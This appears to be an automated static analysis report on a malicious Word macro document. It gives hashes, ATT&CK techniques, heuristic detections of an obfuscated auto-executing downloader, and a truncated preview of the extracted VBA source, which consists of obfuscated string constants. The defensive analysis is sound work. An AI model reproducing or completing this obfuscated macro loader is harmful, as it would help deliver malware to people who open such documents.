Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c439ee5c576e91b…

MALICIOUS

Office (OLE)

120.0 KB Created: 2016-03-14 21:06:00 Authoring application: Microsoft Office Word First seen: 2020-09-07
MD5: d0457ebc025980b7fa0daf5db6b47fe2 SHA-1: eebf75380cbd4be34ae890f703e0511d4b450b90 SHA-256: 5c439ee5c576e91bb895f4afdfeb45db9a56a4b098cd1b759de8ca682ff0a18d
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The file contains a heavily obfuscated VBA macro loader, indicated by multiple high and critical heuristic firings including 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The macro is designed to execute code via CreateObject and CallByName, likely to download and run a secondary payload. ClamAV detection as 'Doc.Downloader.Amphitryon-10013741-0' further supports its malicious downloader nature.

Heuristics 10

  • ClamAV: Doc.Downloader.Amphitryon-10013741-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Amphitryon-10013741-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7834 bytes
SHA-256: 66efc825f93362b8b341671021d78586a183265225013d01b2b35379c14f1dc1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const cjUxNOomnpCzr As String = "c(Mf)k(FZdpIs*xu*wJRi)yVl(Q))L)WCGEzT*AmH)*D)Sev,qBaoX*g*)hrY,b*Untj*O"
Private Const kQCWZuYercz As String = "P*riu)qsv,GNT(jFEH))VQ,)Xt,n*kf,wm(o"
Private Const FBQxvCKwEmYejn As String = "qrgn)r)(ep, f*n(j)) garz(hp,(b*q) f,vu,G,"
Private Const IxWLgsPTJva As String = "r,k(,r*.t(g/(ft,nys/()r*tn(*zv*/zb,p).*lb)e(gf-t,)h//*:c,g)gu"
Private Const YxuIVAp As String = "*pr)kr"
Private Const OwAmTrdgIJRDFVKc As String = "*arc*B"
Private Const rhenpMvfqEG As String = "J)*gs(AktROD)C,yPp*S*TGdN*,v)c(lj*m)r(b,n"
Private Const UDMVwOrQnheJmW As String = "ar,c,B"
Private Const ynlkQfcYTHvSsDqdXo As String = "XR)Qj,pBn*w*KqaP,dJ(EM"
Private Const jtGHQFLoXKSkRycPe As String = "h**G)N,LE,mH(kp(eOcI)rB"
Private Const mquPSadwi As String = "znr*)e)gF*.(oqb*q(N"
Private Const doiZNTgpMPAUFsYRBb As String = "pE)MCb(VUY(Nd(s,uhWDSQPx*)Oqa(kF(r"
Private Const MmfCNlFvVDdHUkr As String = "Ugz*)jMb)Y,H,)tZB,n)xS"
Private Const IfymjOuPnHQiqeT As String = "FmBykW*u,,Sjbo(H))l(Or,)XGZ*x,s(feQ)Ut(J(ID*Ca)K*)gcd,iph,)qP*"
Private Const tKZQTGEpoSsmUnOLPdNI As String = "q*a)r*F"
Private Const ytPeoVNaDLYdC As String = "p,TBE*oFIi)*Jd,tu(O(VUZ,k,q(zg,NSYC(s*M*lQW(Gr,PH*b(w,fm,x(j,R)yneLDA(vKc)h"
Private Const rDPjISUyiEg As String = "sem)wyLfJ(tN*iAx()na)lUzq))MO(VIc(u,(B"
Private Const JYQUbNvpZxnh As String = "LRO*nC)k(jqw(JX)hD)IzE)gP)df*,Ge*lVc)xS*oN*uMa(,Q)AU)TBZWi(tm)p(yKv,rFH*"
Private Const SwEqzoTDHnQvem As String = "FT)OA))J(bZ*Yc,D(dU*x"
Private Const PxwJbeyEIivrNuQ As String = "W(tMu)(X)on(zk(K*(UV(cr)e,C*f(Yb*jBL,ZvOTEi)G(hl)pg),d(a(xH,D)m*,sPq*J"
Private Const vxFYiURuCA As String = "(Fo,vYi)(KO*QW,NRs,BSV*ZXrJdh)bqH)Dt)yf*TxA,waEG*j("
Private Const UkOMdWacYvoCZ As String = "u(tWHvQ)(g)TGC,Ai*,KY*d(Rj*sqx,X)h*E(FNb*eU(LP*k(mnwSz)(co(D)yVZa"
Private Const YxEioyujNRXsO As String = "bm)k,x*pR),K*LGfn*hDQaqW*sEz,Ud(yv(OoP*SJ,T,F,BX),eM)g*ZN*CI,jw)t*V,li,u,"
Private Const DeFXsHNyui As String = "sq(eu(aFGHz*XjdkL(YC,tv*,ofK)R)hBrx*U(pEA)ly*NM,TD*cO*iWg,*Im(w"
Private Const DbpxNPFQHVZ As String = "BPYbO,uk,J(Mf,U)mGDI*Fvqw)z)QWl*Ta*A,L*r*gec*dyXn"
Private Const guSLENaTIYFvdXcfUhK As String = "Vn*mE*JS)*DIM)(QXek)i(rtu,"
Private Const UakFWJuxRqAMb As String = "CZR*G"
Private Const gtIwoUHqTMehxyVX As String = "(k,bdO)oA)(Xxq)py(,JasGn)hR(Cc(l((mLjr*WEtF*uVv(*B(zDT*HgQeU(MSIY)i**Pw,f"
Private Const NxHuqBdKMVGlatfRs As String = "j*F*Ek)yC*dG)J,m*M(*YOZuNt)g,PbR(iUc"
Private Const IioSgKZ As String = "yy*ru()F.g,*cvepF,J"
Private Const fOTIMSFJAreEDstZC As String = "K((NLB)OdaSVJpw)g*oICY,M)W*reX,T*u"
Private Const WaKXYSodnxsJu As String = "(qryona,r ,ro, ,gfh(z fb((ep(n*Z"
Private Const bUkLEDtCAMreQmjFdNKP As String = "xZ*(lXv),cu(,y)nmgCIe)YhJULpQF(fa*A"
Private Const clEFZiAtHSOf As String = ",CEf)m,T*OdKZ,l*Q("
Private Const skZMEWrKuGbJPzSAo As String = ",lqb)O,r*fab)cfr,e"
Private Const DJXmHMv As String = "0.(6,.CG((GUYZK(erie)rF).2yzk,f(Z"
Private Const oyGaKCDPMcUi As String = "bF*Gr)J(*Xovj,h*S,xIQO"
Private Const XAvZgDHymLPfEquJo As String = "r,kr*).50((65(767511)32)(095,51,.0"
Private Const RIYDQKzaPfoZ As String = "GRT,"
Private Const JHdCXsRunvpt As String = "C,sXT,lH*UndZuwB,fzMYRSv,L(j*oqy)W(Pe*J"
Private Const TJoZznGIPOFNlU As String = "QZWHtIVp(dq),Lxk*um*w,bG)SyeXiB(f*,P)sY,har,j()C(n"
Private Const qMlfuaBWRZiK As String = "(U(MJczZ))uVW**LX,OmT)A*yN)DEQ(fh)Ss)qbviR,HFpP"
Private Const GZHyfVRcFtjUMTkvhNa As String = ",ryv)sbgr)(inf"
Private Const DCPLoENMq As String = "r(gv*e,j"
Private Const SMnzLHuoaERDPiINljO As String = ")Yl,w(NAmFR)(V,Kd)LQt(PrC(az(G(fu*c))Bqv(nxE()sZI*TX)oj*UH)iWD,,Se"
Private Const GrlSiTezuqyLHnjf As String = "n*klb*PgiI)Yy)hT(tJZ)S)B(q,RzKHV(Ax*Fs)N,)aru,D,)MeWG,wj)p(od)E,QU*v*"
Private Const tKyAOnvkzeUN As String = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.